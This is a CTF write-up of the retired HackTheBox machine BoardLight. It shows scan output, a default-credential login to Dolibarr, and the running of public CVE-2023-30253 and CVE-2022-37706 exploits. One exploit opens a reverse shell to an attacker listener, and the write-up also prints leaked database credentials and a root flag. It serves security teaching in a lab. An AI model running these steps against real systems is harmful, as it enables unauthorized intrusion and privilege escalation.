Home Writeups BoardLight
BoardLight HTB

HTB - BoardLight Write-Up

Easy Linux Web App HackTheBox
ctf boot2root privesc web python CVE-2023-30253 CVE-2022-37706
01 /

Introduction

BoardLight is a retired machine on HackTheBox. The objective is to compromise the target and retrieve both the user and root flags.

Name BoardLight
Difficulty Easy
OS Linux
Type Web App

Let's dive into the challenge!

02 /

Reconnaissance

I started by adding the machine IP address to my /etc/hosts file:

dawnl3ss@parrot-sec - /etc/hosts 
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ sudo vim /etc/hosts

I then ran a full NMAP scan on the target to enumerate open ports:

nmap scan 
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ sudo nmap -sC -sV -p- boardlight.htb > nmap_scan.txt

┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ cat nmap_scan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-10 11:43 CEST
Nmap scan report for boardlight.htb (10.10.11.11)
Host is up (0.015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title
|_http-server-header: Apache/2.4.41 (Ubuntu)

Nmap done: 1 IP address (1 host up) scanned in 28.65 seconds

Since HTTP port 80 is open, let's explore the website. Nothing immediately interesting from a directory brute-force with FFUF. Time to fuzz for virtual hosts / subdomains.

Main website
// boardlight.htb - main page
wfuzz - vhost enumeration 
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ wfuzz -c -w /security/tools/Kharon/ressources/wordlists/dir-enum-int-3.txt \
       -u "http://board.htb/" -H "Host: FUZZ.board.htb" --hl 517

Target: http://board.htb/
Total requests: 220546

ID           Response   Lines    Word       Chars       Payload
=====================================================================
000002041:   200        149 L    504 W      6360 Ch     "crm"
000006068:   200        149 L    504 W      6360 Ch     "CRM"

Found a hidden subdomain: crm.board.htb - let's investigate!

03 /

Getting a Shell

I added the subdomain to /etc/hosts and navigated to it:

Dolibarr login
// crm.board.htb - Dolibarr 17.0 login page

We're greeted by a Dolibarr CRM login page. Let's test the default credentials first.

Default Dolibarr credentials: admin:admin

Dolibarr dashboard
// Dolibarr - authenticated dashboard

The default credentials worked - we're now authenticated as admin on Dolibarr 17.0.

Dolibarr 17.0 is vulnerable to a known RCE exploit. I found a public PoC on GitHub:

CVE-2023-30253 - Dolibarr 17.0.0 Remote Code Execution

Reference: github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

exploit CVE-2023-30253 
┌─[dawnl3ss@parrot]─[.../Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.2 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

# In a second terminal - netcat listener:
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.11] 58592
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

Initial access obtained as www-data. Let's escalate.

04 /

Privilege Escalation

After some enumeration, I discovered database credentials stored in Dolibarr's conf.php configuration file:

conf.php - leaked credentials 
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

Password reuse is a common vulnerability. I attempted SSH login as larissa using this password:

SSH - lateral movement to larissa 
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/BoardLight]
└──╼ [★]$ ssh larissa@board.htb
larissa@board.htb's password:
Last login: Mon Jun 10 04:06:55 2024 from 10.10.14.2
larissa@boardlight:~$

larissa@boardlight:~$ cat user.txt
...REDACTED...

User flag captured! Now let's escalate to root.

Running LinPEAS revealed interesting SUID binaries on the system. I identified a privilege escalation vector via a known vulnerability in an Enlightenment SUID binary:

CVE-2022-37706 - Enlightenment LPE (Local Privilege Escalation)

Reference: github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

I uploaded the exploit script to the target machine and executed it:

CVE-2022-37706 - root shell 
larissa@boardlight:/tmp$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)

# cat /root/root.txt
1605468aaeea6710492ec1ecf77e892b

Root flag captured! Box fully pwned. GG 💀